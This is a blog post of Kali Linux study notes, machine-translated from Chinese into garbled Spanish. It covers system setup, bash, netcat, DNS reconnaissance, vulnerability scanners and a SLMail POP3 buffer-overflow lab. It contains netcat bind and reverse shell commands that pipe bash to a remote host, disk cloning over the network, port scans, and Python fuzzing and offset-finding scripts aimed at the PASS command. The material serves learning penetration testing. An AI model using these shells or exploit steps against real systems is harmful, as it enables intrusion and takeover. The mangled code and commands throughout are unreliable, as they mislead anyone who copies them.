Que las notas de estudio Kali Linux Problema

R: instalar Kali
comandos agregan sudo para ejecutar como root
reinicio reinicio shutdown -h now apagado
1. Cambiar usuario
primer paso: sudo passwd root
Paso dos: Introduzca la contraseña antigua (kali) para confirmar
el Tercer Paso: Introduzca la nueva contraseña, y luego Por último, se quiere entrar en el reinicio de confirmación de reinicio,
inicie la sesión con la raíz + contraseña
administrador raíz (usuario root): cuenta de 1: kali kali (cuenta general) cuenta 2
2. para la fuente y actualización
/ sources.list entrar en vim 1.vim / etc / apt Añadir editor de código fuente
2. Si guarda un problema de permisos con wq! Guardar
transductor de entrada 3. Después Fuente: apt-get update && apt- get upgrade && apt-get clean software y actualización de origen de la actualización
3. localización
1. El terminal de entrada apt-get install-xfonts INTL- chino TTF-WQY-microhei de montaje china fuentes (fuentes pueden ser descargados después del intercambio fuente)
2. después de reemplazar el formato de codificación dpkg-reconfigure locales (usuario root) en la interfaz gráfica (cuadro de selección, Tab es un traspaso con se selecciona *), seleccione zh_CN.UTF-8 después de determinar el zh_CN.UTF-8 como el valor predeterminado.
3. Introduzca el terminal: reinicio reinicio del sistema, la lista idioma de la pantalla de inicio de sesión en el prestar atención superior a si zh_CN.utf8, la apertura de la lista para determinar seleccionada para los chinos - China (parte del cambio, si se produce, reinicio, pueden resolver muchos problemas)
4 instalar el método de entrada
Update-GET 1.apt
2.apt-get install fcitx
3.apt-GET-instalar fcitx googlepinyin
continuación, reiniciar, habrá un nuevo método de entrada, ya no hay necesidad de configurar el mismo que el original, haga clic en la esquina superior derecha puede cambiar el método de entrada también puede configurar sus propios accesos directos.
El terminal de inicio rápido se establece
en 2.020,1, pero no allí comando gnome-terminal para iniciar el Terminal:
tomar ahora es xfce4- comando para iniciar el terminal,
que se encuentra en la configuración ---- ---- >> >> Teclado en Agregar, escriba xfce4 -terminal

Documento de Referencia: https: //blog.csdn.net/Jack0610/article/details/103931466 depth_1-utm_source = distribute.pc_relevant.none tareas & utm_source = distribute.pc_relevant.none-tarea?

II: familiarizarse con el entorno
1. familiarizado con el comando de bash
ls: lista el directorio actual es equivalente a ganar la siguiente dir
uso Kali bajo bshell defecto:
azul para el blanco representa un directorio de archivos ordinario para archivos ejecutables rojo archivos comprimidos verdes
-L muestran en el archivo largo la primera columna indica la primera letra d representa un archivo de dispositivo directorio c l está conectado - b representa el archivo representado rápido
-a mostrar los archivos ocultos
-h fácil de leer que se muestra
-sort = tiempo = tamaño Ordenar por tamaño
cd: en el directorio de la misma victoria Cd
. en el directorio actual
... el directorio actual al directorio padre
pwd: Ver el directorio de trabajo actual ~ indica el directorio personal del usuario (directorio raíz)
CAT / ruta: muestra el contenido completo del tipo de texto
más / ruta: de acuerdo con el contenido del archivo visualización de la ventana actual, sólo uno, por-pantalla de vista
menos / ruta: similares Más
cola / ruta: la pantalla por defecto últimas 10 líneas del archivo - el número de líneas de
reloj de comandos -n número: sin número de segundos de ejecutar un comando
nombre de archivo rm: borrar el archivo
-r: eliminar el directorio
de archivos cp el nuevo nombre de [nombre de archivo]: copiar el archivo
-R: copiar el directorio /
pid: ver el proceso de
matar el proceso: matar el proceso
q: dejar de fumar pid
PD: ver el proceso
- EF
el AUX
grep: contenido de la salida del filtro versión mejorada eqrep
tarjeta de ifconfig arriba / abajo: encendido / apagado tarjeta de
netstat -pantu: Ver y dirección generada localmente tcp udp conexión
ejemplo: netstat -pantu | egrep -v '0.0.0.0 | :::' | awk '{} 5 Imprimir $.' | egrep -v 'y | la Dirección'
| cut -d ':' 1-f | tipo | el uniq> IP.
Nota: | aWK trunca corte tubo de columna de la toma: después de que el primer número de sort uniq salida
ruta
Monte: Monte el directorio de archivos para montar
-o nombres de archivo .iso de bucle / directorio para montar el archivo ISO en un directorio especificado
dmesg: funciones similares y la cola, el directorio predeterminado
hallazgo: Encuentra directorio de archivos
-Nombre encontrar el nombre de archivo / presentación directorio raíz
-iname encontrar el directorio de nombre de archivo similar
comodín *
whereis: encontrar la misma función, menos resultado, rápido y buscarse un área de gestión de paquetes
nombre -b: buscar binarios
eco: comando de escritura para visualizar
el editor de texto 2.vim funcionamiento básico
introducir vim: nombre del archivo vim en el editor de texto o vi
editor: pulse i construido
: 1 pulse esc construido
2 + pulse el Cambio:
3. Guardar y salir: WQ salir sin guardar q! Obligado a guardar y WQ salida!
Entro en el modo de edición
esc volver al modo comando
modo dd de línea de comandos para quitar
la línea o se introduce el modo de comando en
el modo de comando y de línea para copiar
el modo de comando P-line pegar
Agregar
3. conducto
carácter de canalización:
|: verticales carácter de comando frontal como entrada después del comando
y : alrededor de dos seguido por la aplicación
&&: si el frente detrás de la implementación de error no se realiza, la ejecución exitosa del detrás de comandos
||: Si el error de ejecución se lleva a cabo detrás del frente, no se ejecuta el comando de vuelta con éxito
4.Shell guión
! # bin / línea de fiesta indica el comienzo del archivo documento explica la forma en
tres: la optimización del ambiente de trabajo kali
1. configuración de red
dirección IP temporal (fallo de reinicio)
dhclient eth0: obtener automáticamente la dirección IP
ifconfig eth0 ip: Especifica la dirección IP
route add default gw puerta de enlace IP: Especifica la puerta de entrada
de eco servidor de nombres dirección ip> / etc /resolv.conf: cambiar la dirección DNS
dirección IP fija
perfil cat / etc tarjeta de red / / interfaz de
dirección: dirección IP
máscara de red: máscara de subred,
puerta de enlace: puerta de enlace
de red: la dirección de red
de difusión: difusión de direcciones
DNS-servidores de nombres: dirección DNS
2. entorno de configuración de
cuatro: algunas herramientas básicas
1.netcat
Base64 comando: base64 codificado contenido Ctrl + D para
lograr la función de telnet
-v: mostrar detalles contenidos
puerto dirección IP -n: nombre de dominio se resuelve
a la información de texto de transmisión
en el que una necesidad de abrir un puerto y el otro como un cliente para conectarse al
host a :: nc -l -p puerto del puerto host B nc ip -nv
-l puerto de escucha abierta y el número de puerto especificado -p
| grep 333 netstat -pantu
después de realizar: Numbert -q después de que los segundos la salida

Salida de entrada <
directorio de transferencia de
envío de extremo: tar -cvf - Directorio | nc -lp puerto -q 1
extremo receptor: nc -nv Dirección IP Puerto | tar -xvf -
transferencia de archivos cifrados
A: -lp nc 333 | mcrypt --flush - -a -m Rijndael de 256 Fbqd BCE> 1.MP4
B: la mcrypt --flush -Fbq Rijndael -a -m BCE-256 <a.mp4 | Q NC-333 1.1.1.1 1 -nv.
servicios de streaming
Un gato 1.MP4 | nc la -lp 333
B: -nv nc 1.1.1.1 333 | mplayer -vo x11 -cache 3000-
puerto de exploración
-z: escaneo de puertos
-u: el puerto UDP sonda
nc -nvz dirección IP 1-65535
nc -nvzu dirección IP 1-1024
clon de forma remota duro
A: NC -lp 333 | dd of = / dev / SDA
B: dd if = / dev / SDA | -q 1 333 NC -nv 1.1.1.1.
dd: nivel de bloque de comandos copia impresa
si : InputFile
control remoto
hacia adelante:
A: NC 333 -LP la -C bash (host)
B: NC 333 -nv 1.1.1.1
inversa:
A: -lp nc 333
B: 333 nc -nv 1.1.1.1 golpe -C (host)
usuarios de Windows para instalar nc voluntad golpe cmd
-C golpe transmitida a otro extremo de la carcasa
dns: 53 puerto
de cifrado nc-ncat de distancia controlar
falta nc de las capacidades de autenticación y cifrado
NCAT Nmap incluidos en el kit
a: -C NCAT la fiesta -ALLOW 192.168.43.182 -vnl 333 --ssl
B: NCAT -nv 192.168.43.100 --ssl
diferentes sistemas / plataformas funcionan parámetros nc diferente 2.wireshark
analizador de protocolos Ethereal sniffer
motor etéreo: libpcap-linux-windows WinPcap

3.tcpdump
cinco: la recopilación de información pasiva
recogida de información:
el nombre completo del: nombre de dominio completo
consultas recursivas iterativo de consultas de
registros de dominio: un registro de intercambio de correo DNS inversa cname anfitrión registro de alias registro PTR mx
nslookup
DNS recopilación de información
DIG
+ + Noall responder
-x anti a consulta
la información de versión se unen: el caos txt version.bind @ ns.sina.com
seguimiento: + trazas
de transferencia de zona: DIG @ example.com ns1.example.com
anfitrión -T el -l sina.com ns3.sina.com
Ver manual de comandos :
hombre
información
-help -H
campo DNS voladura
feroz -dnsserver 8.8.8.8 -dns sina.com.cn -wordlist a.txt
dnsdict6 el X-16-d4 -t sina.com
dnsenum -f dnsbig.txt -dnsserver 8.8.8.8 -o sina.xml sina.com
dnsmap sina.com -w dns.txt
dnsreson -t 10 -d sina.com --lifetime BRT -D dnsbig.txt
-t -d sina.com std dnsreson
DNS de registro de información
de WHOIS
WHOIS -h whois.apnic.net 192.0.43.10
motor de búsqueda
Shodan
NET
Ciudad
País
Puerto
OS
anfitrión nombre de host o nombre de dominio
del servidor
Google
Recon-ng
Seis: Colección activa de información
1. encontró
dos descubrimiento capa de
la arping
1.1.1.1 -C. 1 la arping
la arping 1.1.1.1 ip cheque -d con diferente inspección engaño mac arp

nmap
namp 192.168.1.1/24 -sn

netdiscover
主动:
netdiscover -i eth0 -r 1.1.1.0/24
netdiscover -i iplist.txt
被动:
netdiscover -p

Scapy
APT-GET-Install python3 gnuplot
nombre de la función debe estar en mayúsculas ()
SR1 () Contrato

Tres encontró
protocolo ICMP
traceroute
la -r de ping
hping3
cuatro encontrado
descubrimiento de sistemas
Scapy
nmap ip puerto de dirección de -pu -sn
ACK encontrar la dirección IP del puerto nmap -PA -sn
hping3
siete: explotar
nmap
root @ Kali: / usr / reportar este contenido share / nmap / scripts # script.db CAT | WC la -l
SMB-VULN-ms10-061.nse
impresora compartida vulnerabilidad
nmap-P445-script = smb- enumeración-shares.nse-script-args = smbuser = admin, smbpassword = pass1.1.1 0.1
escáner de vulnerabilidades
openvas
proyecto rama Nessus
instalación openvas
apt-get install openvas
configurar la instalación openvas
openvas-configuración
de verificación
openvas-cheque-configuración
Ver cuenta corriente
openvasmd-list-usuarios
de modificar contraseña de la cuenta
openvasmd usuarios = admin-nueva- password = contraseña
actualización openvas
openvas-Feed-actualización
se inicia openvas servicio
openvas-Start
Nessus
para descarga
de instalación:
-dpkg i
ruta de instalación: / opt / nessus
iniciar el servicio:
/etc/init.d/nessusd comienzo

Ocho: desbordamiento del búfer
de Windows
comando netstat es ni interna ni externa comando
puede no estar actualizada ruta de acceso ruta de acceso a este comando se encuentra, que no está configurado variables de entorno, si la variable de entorno de configuración se puede acceder en cualquier camino.
Configurar las variables del sistema, variable Path, añadiendo "% SystemRoot% \ system32;
re-abrir la ventana de comandos cmd (asegúrese de volver a abrir, de lo contrario no tendrá ningún efecto)
netstat-ano
Fuzzer
XP software de cliente
slmail5.5 mona.py Inmunidad depurador
XP final
del cortafuegos establecer la excepción de puerto: smtp25, POP3 110
solicitud de eco ICMP abre
prueba final kali
NC 110 192.168.43.147, 192.168.43.147 NC 25
POP3 existe desbordamiento del búfer de comandos pase
win7 por encima de los mecanismos de seguridad:
DEP: código de parada se ejecuta desde una página de datos
ASLR : dirección de memoria aleatoria y el programa de ejecución DLL cargado, cada dirección reinicio cambio de
registro EIP contiene la dirección de la siguiente instrucción
de fuzzing de guión py
las ideas: EIP modificar código shell de la dirección de memoria, el espacio de direcciones de escritura en código shell, el programa lee registro EIP valor, salta hacia y ejecuta el código shell segmento de código
kali se puede utilizar en el editor de secuencia de comandos de Python vim o alfombrilla de ratón, después de guardar los permisos de modificación de la propiedad para los ejecutables
2.py
#! / Usr / bin / python
importación socket
buffer = [ “A”]
contador = 100
mientras len (buffer) <= 50:
buffer.append ( “B” * contador)
contador = contador + 200
para cadena en tampón:
print “fuzzing pase con% s bytes”% len (string)
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
conectar = s.connect (( '192.168.43.147', 110))
s.recv ( 1024)
s.send ( 'prueba de usuario' + '\ r \ n')
s.recv (1024)
s.send ( 'pasar '+ cadena +' \ r \ n')
s.send ( 'dejar de fumar \ r \ n ')
s.close ()
图片: https://uploader.shimo.im/f/vceG0VHfpUYnjcPJ.png
图片: https://uploader.shimo.im/f/AIKerQJcHd8s7i22.png
3.py
#! / usr / bin / pitón
socket importación
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A' * 2700
Probar:
print “\ búfer mal nSending ...”
s.connect (( '192.168.43.147', 110))
date = s.recv (1024)
s.send ( 'prueba de usuario' + '\ r \ n')
datos = s.recv (1024)
s.send ( 'PASS '+ tampón +' \ r \ n')
print “\ Ndone !.”
excepto:
print “no se pudo conectar a pop3”

Encontrado 4 bytes desbordamiento precisa
dicotomía
4.py
guión rb
método de cadena única:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700

#! / Usr es / en bin / python de
toma de importación
es de = socket.socket, (socket.AF_INET, socket.SOCK_STREAM),
buffer ='Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9 '

el intento:
Imprimir "\ nSending mal Buffer ..."
s.connect (( '192.168.43.147', 110))
FECHA = s.recv (1024)
s.send ( 'Usuario de prueba' + '\ R ^ \ n')
de datos = s.recv (1024)
s.send ( 'Pass' + Buffer + '\ r \ n- el')
print "\ Ndone!."
la excepción:
Imprimir "podría no conecta con pop3"
foto: https://uploader.shimo.im /f/dcoqQfQP0sImNj4f.png
39694438 descendente
hexadecimal 38 44 69 39 = ascii 8di9

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438

Calcula el desplazamiento correspondiente
imagen: https://uploader.shimo.im/f/i5iBJYnztiUcs8sf.png
5.py
colocado shellcode esc en la
secuencia de comandos Python: tampón = 'A' * 2606 + 'B' . 4 + 'C' (3500-2606-4)
para calcular el tamaño del registro 416 esp suficientemente el código shell
7.py juzga mala disposición
de los diferentes tipos de programas, protocolos, insectos, se considerarán algunos caracteres a ser personajes malos, que utilizan un fijo
dirección de retorno, el código shell , tampón no aparecen personajes son malos
byte nulo (0x00) el carácter nulo para terminar la operación de copia de cadena
de retorno (0x0D) de retorno de carro, la entrada de comandos representa pop3pass
ideas de: transmitir 0x00-0xff256 caracteres, encontrar todos los personajes malos

badchars = 0-256 (correspondiente a Hex)
0A 0D Tab clave de recapitulación valor nulo 00

Redirigir el flujo de datos
se sustituye con un valor de dirección de EIP esp
pero esp generado aleatoriamente cambio de dirección, difícil decodificar factible
SLMail roscado aplicaciones, el sistema operativo para el rango de direcciones asignado a cada hilo, cada hilo rango de direcciones incierto

Pensando en el trabajo
para encontrar una dirección fija en el sistema de módulos de memoria
en busca jmp esp dirección de la instrucción salta en el módulo, entonces el salto indirecto a la instrucción de la esp, realizando de este modo el código shell
módulos de memoria mona.py de identificación de la escritura, la búsqueda de "dirección de retorno" es jmp esp

mona.py necesidad de usar python2.7 o temprano

Publicado siete artículos originales · ganado elogios 0 · Vistas 82

Supongo que te gusta

Origin blog.csdn.net/q20010619/article/details/104777224
Recomendado
Clasificación